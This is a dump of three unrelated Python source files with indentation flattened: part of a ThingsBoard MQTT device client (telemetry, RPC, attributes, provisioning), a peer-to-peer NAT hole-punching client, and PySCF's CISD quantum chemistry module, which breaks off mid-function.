def __on_firmware_received(self, version_to):
with open(self.firmware_info.get(FW_TITLE_ATTR), "wb") as firmware_file:
firmware_file.write(self.firmware_data)
log.info('Firmware is updated!\n Current firmware version is: %s' % version_to)
def __update_thread(self):
while True:
if self.firmware_received:
self.current_firmware_info[FW_STATE_ATTR] = "UPDATING"
self.send_telemetry(self.current_firmware_info)
time.sleep(1)
self.__on_firmware_received(self.firmware_info.get(FW_VERSION_ATTR))
self.current_firmware_info = {
"current_" + FW_TITLE_ATTR: self.firmware_info.get(FW_TITLE_ATTR),
"current_" + FW_VERSION_ATTR: self.firmware_info.get(FW_VERSION_ATTR),
FW_STATE_ATTR: "UPDATED"
}
self.send_telemetry(self.current_firmware_info)
self.firmware_received = False
time.sleep(0.2)
@staticmethod
def _decode(message):
content = loads(message.payload.decode("utf-8"))
log.debug(content)
log.debug(message.topic)
return content
@staticmethod
def validate(validator, data):
try:
validator.validate(data)
except ValidationError as e:
log.error(e)
raise e
def _on_decoded_message(self, client, content, message):
if message.topic.startswith(RPC_REQUEST_TOPIC):
request_id = message.topic[len(RPC_REQUEST_TOPIC):len(message.topic)]
if self.__device_on_server_side_rpc_response:
self.__device_on_server_side_rpc_response(client, request_id, content)
elif message.topic.startswith(RPC_RESPONSE_TOPIC):
with self._lock:
request_id = int(message.topic[len(RPC_RESPONSE_TOPIC):len(message.topic)])
callback = self.__device_client_rpc_dict.pop(request_id)
callback(client, request_id, content, None)
elif message.topic == ATTRIBUTES_TOPIC:
dict_results = []
with self._lock:
# callbacks for everything
if self.__device_sub_dict.get("*"):
for subscription_id in self.__device_sub_dict["*"]:
dict_results.append(self.__device_sub_dict["*"][subscription_id])
# specific callback
keys = content.keys()
keys_list = []
for key in keys:
keys_list.append(key)
# iterate through message
for key in keys_list:
# find key in our dict
if self.__device_sub_dict.get(key):
for subscription in self.__device_sub_dict[key]:
dict_results.append(self.__device_sub_dict[key][subscription])
for res in dict_results:
res(client, content, None)
elif message.topic.startswith(ATTRIBUTES_TOPIC_RESPONSE):
with self._lock:
req_id = int(message.topic[len(ATTRIBUTES_TOPIC + "/response/"):])
# pop callback and use it
callback = self._attr_request_dict.pop(req_id)
callback(client, content, None)
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way through their network flow at once.
Defaults to 20. Increasing this value will consume more memory but can increase throughput."""
self._client.max_inflight_messages_set(inflight)
def max_queued_messages_set(self, queue_size):
"""Set the maximum number of outgoing messages with QoS>0 that can be pending in the outgoing message queue.
Defaults to 0. 0 means unlimited. When the queue is full, any further outgoing messages would be dropped."""
self._client.max_queued_messages_set(queue_size)
def reconnect_delay_set(self, min_delay=1, max_delay=120):
"""The client will automatically retry connection. Between each attempt it will wait a number of seconds
between min_delay and max_delay. When the connection is lost, initially the reconnection attempt is delayed
of min_delay seconds. It’s doubled between subsequent attempt up to max_delay. The delay is reset to min_delay
when the connection complete (e.g. the CONNACK is received, not just the TCP connection is established)."""
self._client.reconnect_delay_set(min_delay, max_delay)
def send_rpc_reply(self, req_id, resp, quality_of_service=None, wait_for_publish=False):
quality_of_service = quality_of_service if quality_of_service is not None else self.quality_of_service
if quality_of_service not in (0, 1):
log.error("Quality of service (qos) value must be 0 or 1")
return None
info = self._client.publish(RPC_RESPONSE_TOPIC + req_id, resp, qos=quality_of_service)
if wait_for_publish:
info.wait_for_publish()
def send_rpc_call(self, method, params, callback):
self.validate(RPC_VALIDATOR, params)
with self._lock:
self.__device_client_rpc_number += 1
self.__device_client_rpc_dict.update({self.__device_client_rpc_number: callback})
rpc_request_id = self.__device_client_rpc_number
payload = {"method": method, "params": params}
self._client.publish(RPC_REQUEST_TOPIC + str(rpc_request_id),
dumps(payload),
qos=self.quality_of_service)
def set_server_side_rpc_request_handler(self, handler):
self.__device_on_server_side_rpc_response = handler
def publish_data(self, data, topic, qos):
data = dumps(data)
if qos is None:
qos = self.quality_of_service
if qos not in (0, 1):
log.exception("Quality of service (qos) value must be 0 or 1")
raise TBQoSException("Quality of service (qos) value must be 0 or 1")
return TBPublishInfo(self._client.publish(topic, data, qos))
def send_telemetry(self, telemetry, quality_of_service=None):
quality_of_service = quality_of_service if quality_of_service is not None else self.quality_of_service
if not isinstance(telemetry, list):
telemetry = [telemetry]
self.validate(DEVICE_TS_OR_KV_VALIDATOR, telemetry)
return self.publish_data(telemetry, TELEMETRY_TOPIC, quality_of_service)
def send_attributes(self, attributes, quality_of_service=None):
quality_of_service = quality_of_service if quality_of_service is not None else self.quality_of_service
return self.publish_data(attributes, ATTRIBUTES_TOPIC, quality_of_service)
def unsubscribe_from_attribute(self, subscription_id):
with self._lock:
for attribute in self.__device_sub_dict:
if self.__device_sub_dict[attribute].get(subscription_id):
del self.__device_sub_dict[attribute][subscription_id]
log.debug("Unsubscribed from %s, subscription id %i", attribute, subscription_id)
if subscription_id == '*':
self.__device_sub_dict = {}
self.__device_sub_dict = dict((k, v) for k, v in self.__device_sub_dict.items() if v)
def subscribe_to_all_attributes(self, callback):
return self.subscribe_to_attribute("*", callback)
def subscribe_to_attribute(self, key, callback):
with self._lock:
self.__device_max_sub_id += 1
if key not in self.__device_sub_dict:
self.__device_sub_dict.update({key: {self.__device_max_sub_id: callback}})
else:
self.__device_sub_dict[key].update({self.__device_max_sub_id: callback})
log.debug("Subscribed to %s with id %i", key, self.__device_max_sub_id)
return self.__device_max_sub_id
def request_attributes(self, client_keys=None, shared_keys=None, callback=None):
if client_keys is None and shared_keys is None:
log.error("There are no keys to request")
return False
msg = {}
if client_keys:
tmp = ""
for key in client_keys:
tmp += key + ","
tmp = tmp[:len(tmp) - 1]
msg.update({"clientKeys": tmp})
if shared_keys:
tmp = ""
for key in shared_keys:
tmp += key + ","
tmp = tmp[:len(tmp) - 1]
msg.update({"sharedKeys": tmp})
ts_in_millis = int(round(time.time() * 1000))
attr_request_number = self._add_attr_request_callback(callback)
info = self._client.publish(topic=ATTRIBUTES_TOPIC_REQUEST + str(self.__attr_request_number),
payload=dumps(msg),
qos=self.quality_of_service)
self._add_timeout(attr_request_number, ts_in_millis + 30000)
return info
def _add_timeout(self, attr_request_number, timestamp):
self.__timeout_queue.put({"ts": timestamp, "attribute_request_id": attr_request_number})
def _add_attr_request_callback(self, callback):
with self._lock:
self.__attr_request_number += 1
self._attr_request_dict.update({self.__attr_request_number: callback})
attr_request_number = self.__attr_request_number
return attr_request_number
def __timeout_check(self):
while not self.stopped:
if not self.__timeout_queue.empty():
item = self.__timeout_queue.get_nowait()
if item is not None:
while not self.stopped:
current_ts_in_millis = int(round(time.time() * 1000))
if current_ts_in_millis > item["ts"]:
break
time.sleep(0.001)
with self._lock:
callback = None
if item.get("attribute_request_id"):
if self._attr_request_dict.get(item["attribute_request_id"]):
callback = self._attr_request_dict.pop(item["attribute_request_id"])
elif item.get("rpc_request_id"):
if self.__device_client_rpc_dict.get(item["rpc_request_id"]):
callback = self.__device_client_rpc_dict.pop(item["rpc_request_id"])
if callback is not None:
callback(self, None, TBTimeoutException("Timeout while waiting for a reply from ThingsBoard!"))
else:
time.sleep(0.01)
def claim(self, secret_key, duration=30000):
claiming_request = {
"secretKey": secret_key,
"durationMs": duration
}
info = TBPublishInfo(self._client.publish(CLAIMING_TOPIC, dumps(claiming_request), qos=self.quality_of_service))
return info
@staticmethod
def provision(host,
provision_device_key,
provision_device_secret,
port=1883,
device_name=None,
access_token=None,
client_id=None,
username=None,
password=None,
hash=None):
provision_request = {
"provisionDeviceKey": provision_device_key,
"provisionDeviceSecret": provision_device_secret
}
if access_token is not None:
provision_request["token"] = access_token
provision_request["credentialsType"] = "ACCESS_TOKEN"
elif username is not None or password is not None or client_id is not None:
provision_request["username"] = username
provision_request["password"] = password
provision_request["clientId"] = client_id
provision_request["credentialsType"] = "MQTT_BASIC"
elif hash is not None:
provision_request["hash"] = hash
provision_request["credentialsType"] = "X509_CERTIFICATE"
if device_name is not None:
provision_request["deviceName"] = device_name
provisioning_client = ProvisionClient(host=host, port=port, provision_request=provision_request)
provisioning_client.provision()
return provisioning_client.get_credentials()
|
P2PClientForServer.py | import json
import threading
import requests
import socket
from requests.adapters import HTTPAdapter
from urllib3.poolmanager import PoolManager
import asyncio
import websockets
import time
from threading import Thread
class SourcePortAdapter(HTTPAdapter):
""""Transport adapter" that allows us to set the source port."""
def __init__(self, port, *args, **kwargs):
self._source_port = port
super(SourcePortAdapter, self).__init__(*args, **kwargs)
def init_poolmanager(self, connections, maxsize, block=False):
self.poolmanager = PoolManager(
num_pools=connections, maxsize=maxsize,
block=block, source_address=('', self._source_port))
def get_host_ip():
s = None
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
finally:
if s is not None:
s.close()
return ip
class P2PClientManagement(object):
def __init__(self, server, client_id, local_ip, local_listen_port):
self.httpsession_with_source_port = requests.session()
self.httpsession_with_source_port.mount("http://", SourcePortAdapter(local_listen_port))
self.httpsession = requests.session()
self.local_ip = local_ip
self.local_listen_port = local_listen_port
self.client_id = client_id
self.server = server
self.register_p2pinfo_thread_stop_flag = False
self.p2p_websocket_client = None
self.last_connect_time = 0
self.connect_lock = threading.Lock()
self.tcp_connect_with_same_source_port_interval = 0.5 # 使用相同tcp源端口的两次请求的间隔, 避免端口重用错误
def __del__(self):
self.httpsession_with_source_port.close()
self.httpsession.close()
def register_p2pinfo(self):
p2pinfo_dict = {
"client_id": self.client_id,
"ip_inside": self.local_ip,
"port_inside": self.local_listen_port
}
self.connect_lock.acquire()
# 间隔较短, 可能上次的TCP连接还未结束, 导致直接复用端口报错, 设置0.5秒的间隔
interval = time.time() - self.last_connect_time
if interval < self.tcp_connect_with_same_source_port_interval:
time.sleep(self.tcp_connect_with_same_source_port_interval - interval)
try:
self.httpsession_with_source_port.post(self.server + "/p2pinfo/register", json=p2pinfo_dict)
except Exception as why:
print('except:', why)
self.last_connect_time = time.time()
self.connect_lock.release()
def get_subscribe_p2pinfo_server(self):
result = self.httpsession.get(self.server + "/p2pinfo/subscribe/server")
print(result.status_code, result.content)
content_dict = json.loads(result.content)
return content_dict
async def handle_p2p_msg(self, websocket_client):
message = await websocket_client.recv()
message_dict = json.loads(message)
if message_dict['cmd'] == 'connect':
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 仅发包打洞, 无需等待对端响应, 设置超时时间0.01秒
client.settimeout(0.01)
self.connect_lock.acquire()
# 间隔较短, 可能上次的TCP连接还未完全结束, 导致直接复用端口报错, 设置0.3秒的间隔
interval = time.time() - self.last_connect_time
if interval < self.tcp_connect_with_same_source_port_interval:
time.sleep(self.tcp_connect_with_same_source_port_interval - interval)
client.bind((self.local_ip, self.local_listen_port))
try:
client.connect((message_dict['ip'], message_dict['port']))
message_dict["result"] = "success"
except Exception as why:
print('except:', why)
message_dict["result"] = "failed"
finally:
if "result" not in message_dict:
message_dict["result"] = "failed"
client.close()
await websocket_client.send(json.dumps(message_dict))
print("connect cmd handle end, %s:%d connect %s:%d"
% (self.local_ip, self.local_listen_port, message_dict['ip'], message_dict['port']))
self.last_connect_time = time.time()
self.connect_lock.release()
else:
message_dict["result"] = "failed"
message_dict["info"] = "not support"
await self.p2p_websocket_client.send(json.dumps(message_dict))
async def subscribe_p2pinfo(self):
p2p_subscribe_server_host = self.get_subscribe_p2pinfo_server()
if self.p2p_websocket_client is None or self.p2p_websocket_client.closed is True:
url = f'ws://{p2p_subscribe_server_host["ip"]}:{p2p_subscribe_server_host["port"]}/p2pinfo/subscribe'
print("reconnect", url)
self.p2p_websocket_client = await websockets.connect(url, ping_interval=10)
# 注册客户端
await self.p2p_websocket_client.send(
"{\"cmd\": \"register\", \"client_id\": \"%s\", \"type\": \"server\"}" % self.client_id)
message = await self.p2p_websocket_client.recv()
message_dict = json.loads(message)
if "result" not in message_dict and message_dict["result"] != "success":
raise Exception("p2pinfo subscribe failed, response msg: %s" % message)
wait_closed_task = asyncio.ensure_future(
self.p2p_websocket_client.wait_closed())
wait_p2p_notify_task = asyncio.ensure_future(
self.handle_p2p_msg(self.p2p_websocket_client))
while 1:
done, pending = await asyncio.wait(
[wait_closed_task, wait_p2p_notify_task],
return_when=asyncio.FIRST_COMPLETED,
)
if wait_closed_task in done:
print("websocket /p2pinfo/subscribe client closed")
# 取消未完成的任务
for task in pending:
task.cancel()
# websocket断开连接, 退出
return
else:
# 不断处理p2p请求将, 重新加入任务
wait_p2p_notify_task = asyncio.ensure_future(
self.handle_p2p_msg(self.p2p_websocket_client))
def register_p2pinfo_forever(self):
# 每隔5秒使用50300端口重新注册, 避免外部nat端口被回收,已测试10秒会被回收
while self.register_p2pinfo_thread_stop_flag is not True:
self.register_p2pinfo()
time.sleep(5)
self.register_p2pinfo_thread_stop_flag = False
def register_p2pinfo_forever_stop(self):
self.register_p2pinfo_thread_stop_flag = True
if __name__ == '__main__':
config_file = open('config.json', 'r')
config = config_file.read()
config_file.close()
config_dict = json.loads(config)
CL = P2PClientManagement(config_dict["p2p_server_address"], config_dict["p2p_client_id"], get_host_ip(), config_dict["local_server_port"])
t = Thread(target=CL.register_p2pinfo_forever)
t.start()
while True:
try:
asyncio.get_event_loop().run_until_complete(CL.subscribe_p2pinfo())
except Exception as why1:
print("/p2pinfo/subscribe exception: %s" % why1)
time.sleep(5)
|
cisd.py | #!/usr/bin/env python
# Copyright 2014-2021 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
Solve CISD equation H C = C e where e = E_HF + E_CORR
'''
from functools import reduce
import numpy
from pyscf import lib
from pyscf.lib import logger
from pyscf.cc import ccsd
from pyscf.cc import ccsd_rdm
from pyscf.fci import cistring
from pyscf import __config__
BLKMIN = getattr(__config__, 'ci_cisd_blkmin', 4)
def kernel(myci, eris, ci0=None, max_cycle=50, tol=1e-8, verbose=logger.INFO):
'''
Run CISD calculation.
Args:
myci : CISD (inheriting) object
eris : ccsd._ChemistsERIs (inheriting) object (poss diff for df)
Contains the various (pq|rs) integrals needed.
Kwargs:
ci0 : (List of) numpy array(s) (if None it will set)
Initial guess for CISD coeffs.
max_cycle : integer
Maximum number of iterations to converge to CISD solution.
If not converged before, calculation stops without having
converged.
tol : float
Convergence tolerance.
verbose : integer
Level of output (roughly: the higher, the more output).
Returns:
conv : bool
Is it converged?
ecisd : List of floats or float
The lowest :attr:`myci.nroots` eigenvalues.
ci : List of 1D arrays or 1D array
The lowest :attr:`myci.nroots` eigenvectors.
'''
log = logger.new_logger(myci, verbose)
diag = myci.make_diagonal(eris)
# Note that ehf is not the HF energy (see `make_diagonal`).
ehf = diag[0]
diag -= ehf
if ci0 is None:
ci0 = myci.get_init_guess(eris=eris, nroots=myci.nroots, diag=diag)[1]
def op(xs):
return [myci.contract(x, eris) for x in xs]
def precond(x, e, *args):
diagd = diag - (e-myci.level_shift)
diagd[abs(diagd)<1e-8] = 1e-8
return x / diagd
if myci._dot is not None:
nmo = myci.nmo
nocc = myci.nocc
def cisd_dot(x1, x2):
return myci._dot(x1, x2, nmo, nocc)
else:
cisd_dot = numpy.dot
conv, ecisd, ci = lib.davidson1(op, ci0, precond, tol=tol,
max_cycle=max_cycle, max_space=myci.max_space,
lindep=myci.lindep, dot=cisd_dot,
nroots=myci.nroots, verbose=log)
if myci.nroots == 1:
conv = conv[0]
ecisd = ecisd[0]
ci = ci[0]
return conv, ecisd, ci
def make_diagonal(myci, eris):
'''
Return diagonal of CISD hamiltonian in Slater determinant basis.
Note that a constant has been substracted of all elements.
The first element is the HF energy (minus the
constant), the next elements are the diagonal elements with singly
excited determinants (<D_i^a|H|D_i^a> within the constant), then
doubly excited determinants (<D_ij^ab|H|D_ij^ab> within the
constant).
Args:
myci : CISD (inheriting) object
eris : ccsd._ChemistsERIs (inheriting) object (poss diff for df)
Contains the various (pq|rs) integrals needed.
Returns:
numpy array (size: (1, 1 + #single excitations from HF det
+ #double excitations from HF det))
Diagonal elements of hamiltonian matrix within a constant,
see above.
'''
# DO NOT use eris.mo_energy, it may differ to eris.fock.diagonal()
mo_energy = eris.fock.diagonal()
nmo = mo_energy.size
jdiag = numpy.zeros((nmo,nmo))
kdiag = numpy.zeros((nmo,nmo))
nocc = eris.nocc
nvir = nmo - nocc
jdiag[:nocc,:nocc] = numpy.einsum('iijj->ij', eris.oooo)
kdiag[:nocc,:nocc] = numpy.einsum('jiij->ij', eris.oooo)
jdiag[:nocc,nocc:] = numpy.einsum('iijj->ij', eris.oovv)
kdiag[:nocc,nocc:] = numpy.einsum('ijji->ij', eris.ovvo)
if eris.vvvv is not None and len(eris.vvvv.shape) == 2:
#:eris_vvvv = ao2mo.restore(1, eris.vvvv, nvir)
#:jdiag1 = numpy.einsum('iijj->ij', eris_vvvv)
diag_idx = numpy.arange(nvir)
diag_idx = diag_idx * (diag_idx + 1) // 2 + diag_idx
for i, ii in enumerate(diag_idx):
jdiag[nocc+i,nocc:] = eris.vvvv[ii][diag_idx]
jksum = (jdiag[:nocc,:nocc] * 2 - kdiag[:nocc,:nocc]).sum()
# Note that ehf is not the HF energy.
ehf = mo_energy[:nocc].sum() * 2 - jksum
e_ia = lib.direct_sum('a-i->ia', mo_energy[nocc:], mo_energy[:nocc])
e_ia -= jdiag[:nocc,nocc:] - kdiag[:nocc,nocc:]
e1diag = ehf + e_ia
e2diag = lib.direct_sum('ia+jb->ijab', e_ia, e_ia)
e2diag += ehf
e2diag += jdiag[:nocc,:nocc].reshape(nocc,nocc,1,1)
e2diag -= jdiag[:nocc,nocc:].reshape(nocc,1,1,nvir)
e2diag -= jdiag[:nocc,nocc:].reshape(1,nocc,nvir,1)
e2diag += jdiag[nocc:,nocc:].reshape(1,1,nvir,nvir)
return numpy.hstack((ehf, e1diag.reshape(-1), e2diag.reshape(-1)))
def contract(myci, civec, eris):
'''
Application of CISD hamiltonian onto civec.
Args:
myci : CISD (inheriting) object
civec : numpy array, same length as a CI vector.
eris : ccsd._ChemistsERIs (inheriting) object (poss diff for df)
Contains the various (pq|rs) integrals needed.
Returns:
numpy array, same length as a CI vector.
'''
time0 = logger.process_clock(), logger.perf_counter()
log = logger.Logger(myci.stdout, myci.verbose)
nocc = myci.nocc
nmo = myci.nmo
nvir = nmo - nocc
c0, c1, c2 = myci.cisdvec_to_amplitudes(civec, nmo, nocc)
t2 = myci._add_vvvv(c2, eris, t2sym='jiba')
t2 *= .5 # due to t2+t2.transpose(1,0,3,2) in the end
log.timer_debug1('vvvv', *time0)
foo = eris.fock[:nocc,:nocc].copy()
fov = eris.fock[:nocc,nocc:].copy()
fvv = eris.fock[nocc:,nocc:].copy()
t1 = fov * c0
t1 += numpy.einsum('ib,ab->ia', c1, fvv)
t1 -= numpy.einsum('ja,ji->ia', c1, foo)
t2 += lib.einsum('kilj,klab->ijab', _cp(eris.oooo)*.5, c2)
t2 += lib.einsum('ijac,bc->ijab', c2, fvv)
t2 -= lib.einsum('kj,kiba->jiba', foo, c2)
t2 += numpy.einsum('ia,jb->ijab', c1, fov)
unit = nocc*nvir**2 + nocc**2*nvir*3 + 1
max_memory = max(0, myci.max_memory - lib.current_memory()[0])
blksize = min(nvir, max(BLKMIN, int(max_memory*.9e6/8/unit)))
log.debug1('max_memory %d MB, nocc,nvir = %d,%d blksize = %d',
max_memory, nocc, nvir, blksize)
for p0, p1 in lib.prange(0, nvir, blksize):
eris_oVoV = _cp(_cp(eris.oovv[:,:,p0:p1]).transpose(0,2,1,3))
tmp = lib.einsum('kbjc,ikca->jiba', eris_oVoV, c2)
t2[:,:,p0:p1] -= tmp*.5
t2[:,:,p0:p1] -= tmp.transpose(1,0,2,3)
tmp = None
eris_ovvo = _cp(eris.ovvo[:,p0:p1])
t2[:,:,p0:p1] += eris_ovvo.transpose(0,3,1,2) * (c0*.5)
t1 += numpy.einsum('ia,iabj->jb', c1[:,p0:p1], eris_ovvo) * 2
t1[:,p0:p1] -= numpy.einsum('ib,iajb->ja', c1, eris_oVoV)
ovov = -.5 * eris_oVoV
ovov += eris_ovvo.transpose(3,1,0,2)
eris_oVoV = None
theta = c2[:,:,p0:p1].transpose(2,0,1,3) * 2
theta-= c2[:,:,p0:p1].transpose(2,1,0,3)
for j in range(nocc):
t2[:,j] += lib.einsum('ckb,ckia->iab', ovov[j], theta)
tmp = ovov = None
t1 += numpy.einsum('aijb,ia->jb', theta, fov[:,p0:p1])
eris_ovoo = _cp(eris.ovoo[:,p0:p1])
t1 -= lib.einsum('bjka,jbki->ia', theta, eris_ovoo)
t2[:,:,p0:p1] -= lib.einsum('jbik,ka->jiba', eris_ovoo.conj(), c1)
eris_ovoo = None
eris_ovvv = eris.get_ovvv(slice(None), slice(p0,p1)).conj()
t1 += lib.einsum('cjib,jcba->ia', theta, eris_ovvv)
t2[:,:,p0:p1] += lib.einsum('iacb,jc->ijab', eris_ovvv, c1)
tmp = eris_ovvv = None
#:t2 + t2.transpose(1,0,3,2)
for i in range(nocc):
if i > 0:
t2[i,:i]+= t2[:i,i].transpose(0,2,1)
t2[:i,i] = t2[i,:i].transpose(0,2,1)
t2[i,i] = t2[i,i] + t2[i,i].T
t0 = numpy.einsum('ia,ia->', fov, c1) * 2
t0 += numpy.einsum('iabj,ijab->', eris.ovvo, c2) * 2
t0 -= numpy.einsum('iabj,jiab->', eris.ovvo, c2)
cinew = numpy.hstack((t0, t1.ravel(), t2.ravel()))
return cinew
def amplitudes_to_cisdvec(c0, c1, c2):
return numpy.hstack((c0, c1.ravel(), c2.ravel()))
def cisdvec_to_amplitudes(civec, nmo, nocc):
nvir = nmo - nocc
c0 = civec[0].copy()
c1 = civec[1:nocc*nvir+1].reshape(nocc,nvir).copy()
c2 = civec[nocc*nvir+1:].reshape(nocc,nocc,nvir,nvir).copy()
return c0, c1, c2
def dot(v1, v2, nmo, nocc):
nvir = nmo - nocc
hijab = v2[1+nocc*nvir:].reshape(nocc,nocc,nvir,nvir)
cijab = v1[1+nocc*nvir:].reshape(nocc,nocc,nvir,nvir)
val = numpy.dot(v1, v2) * 2 - v1[0]*v2[0]
val-= numpy.einsum('jiab,ijab->', cijab, hijab)
return val
def t1strs(norb, nelec):
'''Compute the FCI strings (address) for CIS single-excitation amplitudes
and the signs of the coefficients when transferring the reference from
physics vacuum to HF vacuum.
'''
addrs, signs = tn_addrs_signs(norb, nelec, 1)
return addrs, signs
def tn_addrs_signs(norb, nelec, n_excite):
'''Compute the FCI strings (address) for CIS n-excitation amplitudes and
the signs of the coefficients when transferring the reference from physics
vacuum to HF vacuum.
'''
if n_excite > nelec:
#print("Warning: Not enough occupied orbitals to excite.")
#return [0], [0]
return [], []
nocc = nelec
hole_strs = cistring.gen_strings4orblist(range(nocc), nocc - n_excite)
# For HF vacuum, hole operators are ordered from low-lying to high-lying
# orbitals. It leads to the opposite string ordering.
hole_strs = hole_strs[::-1]
hole_sum = numpy.zeros(len(hole_strs), dtype=int)
for i in range(nocc):
hole_at_i = (hole_strs & (1 << i)) == 0
hole_sum[hole_at_i] += i
# The hole operators are listed from low-lying to high-lying orbitals
# (from left to right). For i-th (0-based) hole operator, the number of
# orbitals which are higher than i determines the sign. This number
# equals to nocc-(i+1). After removing the highest hole operator, nocc
# becomes nocc-1, the sign for next hole operator j will be associated to
# nocc-1-(j+1). By iteratively calling this procedure, the overall sign
# for annihilating three holes is (-1)**(3*nocc - 6 - sum i)
sign = (-1) ** (n_excite * nocc - n_excite*(n_excite+1)//2 - hole_sum)
particle_strs = cistring.gen_strings4orblist(range(nocc, norb), n_excite)
strs = hole_strs[:,None] ^ particle_strs
addrs = cistring.strs2addr(norb, nocc, strs.ravel())
signs = numpy.vstack([sign] * len(particle_strs)).T.ravel()
return addrs, signs
def to_fcivec(cisdvec, norb, nelec, frozen=None):
'''Convert CISD coefficients to FCI coefficients'''
if isinstance(nelec, (int, numpy.number)):
nelecb = nelec//2
neleca = nelec - nelecb
else:
neleca, nelecb = nelec
assert(neleca == nelecb)
frozen_mask = numpy.zeros(norb, dtype=bool)
if frozen is None:
nfroz = 0
elif isinstance(frozen, (int, numpy.integer)):
nfroz = frozen
frozen_mask[:frozen] = True
else:
nfroz = len(frozen)
frozen_mask[frozen] = True
nocc = numpy.count_nonzero(~frozen_mask[:neleca])
nmo = norb - nfroz
nvir = nmo - nocc
c0, c1, c2 = cisdvec_to_amplitudes(cisdvec, nmo, nocc)
t1addr, t1sign = tn_addrs_signs(nmo, nocc, 1)
na = cistring.num_strings(nmo, nocc)
fcivec = numpy.zeros((na,na))
fcivec[0,0] = c0
fcivec[0,t1addr] = fcivec[t1addr,0] = c1.ravel() * t1sign
c2ab = c2.transpose(0,2,1,3).reshape(nocc*nvir,-1)
c2ab = numpy.einsum('i,j,ij->ij', t1sign, t1sign, c2ab)
fcivec[t1addr[:,None],t1addr] = c2ab
if nocc > 1 and nvir > 1:
c2aa = c2 - c2.transpose(1,0,2,3)
ooidx = numpy.tril_indices(nocc, -1)
vvidx = numpy.tril_indices(nvir, -1)
c2aa = c2aa[ooidx][:,vvidx[0],vvidx[1]]
t2addr, t2sign = tn_addrs_signs(nmo, nocc, 2)
fcivec[0,t2addr] = fcivec[t2addr,0] = c2aa.ravel() * t2sign
if nfroz == 0:
return fcivec
assert(norb < 63)
strs = cistring.gen_strings4orblist(range(norb), neleca)
na = len(strs)
count = numpy.zeros(na, dtype=int)
parity = numpy.zeros(na, dtype=bool)
core_mask = numpy.ones(na, dtype=bool)
# During the loop, count saves the number of occupied orbitals that
# lower (with small orbital ID) than the present orbital i.
# Moving all the frozen orbitals to the beginning of the orbital list
# (before the occupied orbitals) leads to parity odd (= True, with
# negative sign) or even (= False, with positive sign).
for i in range(norb):
if frozen_mask[i]:
if i < neleca:
# frozen occupied orbital should be occupied
core_mask &= (strs & (1 << i)) != 0
parity ^= (count & 1) == 1
else:
# frozen virtual orbital should not be occupied.
# parity is not needed since it's unoccupied
core_mask &= (strs & (1 << i)) == 0
else:
count += (strs & (1 << i)) != 0
sub_strs = strs[core_mask & (count == nocc)]
addrs = cistring.strs2addr(norb, neleca, sub_strs)
fcivec1 = numpy.zeros((na,na))
fcivec1[addrs[:,None],addrs] = fcivec
fcivec1[parity,:] *= -1
fcivec1[:,parity] *= -1
return fcivec1
def from_fcivec(ci0, norb, nelec, frozen=None):
'''Extract CISD coefficients from FCI coefficients'''
if not (frozen is None or frozen == 0):
raise NotImplementedError
if isinstance(nelec, (int, numpy.number)):
nelecb = nelec//2
neleca = nelec - nelecb
else:
neleca, nelecb = nelec
nocc = neleca
nvir = norb - nocc
t1addr, t1sign = t1strs(norb, nocc)
c0 = ci0[0,0]
c1 = ci0[0,t1addr] * t1sign
c2 = numpy.einsum('i,j,ij->ij', t1sign, t1sign, ci0[t1addr[:,None],t1addr])
c1 = c1.reshape(nocc,nvir)
c2 = c2.reshape(nocc,nvir,nocc,nvir).transpose(0,2,1,3)
return amplitudes_to_cisdvec(c0, c1, c2)
def overlap(cibra, ciket, nmo, nocc, s=None):
'''Overlap between two CISD wavefunctions.
Args:
s : 2D array
The overlap matrix of non-orthogonal one-particle basis
'''
if s is None:
return dot(cibra, ciket, nmo, nocc)
DEBUG = True
nvir = nmo - nocc
nov = nocc * nvir
bra0, bra1, bra2 = cisdvec_to_amplitudes(cibra, nmo, nocc)
ket0, ket1, ket2 = cisdvec_to_amplitudes(ciket, nmo, nocc)
# Sort the ket orbitals to make the orbitals in bra one-one mapt to orbitals
# in ket.
if ((not DEBUG) and
abs(numpy.linalg.det(s[:nocc,:nocc]) - 1) < 1e-2 and
abs(numpy.linalg.det(s[nocc:,nocc:]) - 1) < 1e-2):
ket_orb_idx = numpy.where(abs(s) > 0.9)[1]
s = s[:,ket_orb_idx]
oidx = ket_orb_idx[:nocc]
vidx = ket_orb_idx[nocc:] - nocc
ket1 = ket1[oidx[:,None],vidx]
ket2 = ket2[oidx[:,None,None,None],oidx[:,None,None],vidx[:,None],vidx]
ooidx = numpy.tril_indices(nocc, -1)
vvidx = numpy.tril_indices(nvir, -1)
bra2aa = bra2 - bra2.transpose(1,0,2,3)
bra2aa = lib.take_2d(bra2aa.reshape(nocc**2,nvir**2),
ooidx[0]*nocc+ooidx[1], vvidx[0]*nvir+vvidx[1])
ket2aa = ket2 - ket2.transpose(1,0,2,3)
ket2aa = lib.take_2d(ket2aa.reshape(nocc**2,nvir**2),
ooidx[0]*nocc+ooidx[1], vvidx[0]*nvir+vvidx[1])
occlist0 = numpy.arange(nocc).reshape(1,nocc)
occlists = numpy.repeat(occlist0, 1+nov+bra2aa.size, axis=0)
occlist0 = occlists[:1]
occlist1 = occlists[1:1+nov]
occlist2 = occlists[1+nov:]
ia = 0
for i in range(nocc):
for a in range(nocc, nmo):
occlist1[ia,i] = a
ia += 1
ia = 0
for i in range(nocc):
for j in range(i):
for a in range(nocc, nmo):
for b in range(nocc, a):
occlist2[ia,i] = a
occlist2[ia,j] = b
ia += 1
na = len(occlists)
if DEBUG:
trans = numpy.empty((na,na))
for i, idx in enumerate(occlists):
s_sub = s[idx].T.copy()
minors = s_sub[occlists]
trans[i,:] = numpy.linalg.det(minors)
# Mimic the transformation einsum('ab,ap->pb', FCI, trans).
# The wavefunction FCI has the [excitation_alpha,excitation_beta]
# representation. The zero blocks like FCI[S_alpha,D_beta],
# FCI[D_alpha,D_beta], are explicitly excluded.
bra_mat = numpy.zeros((na,na))
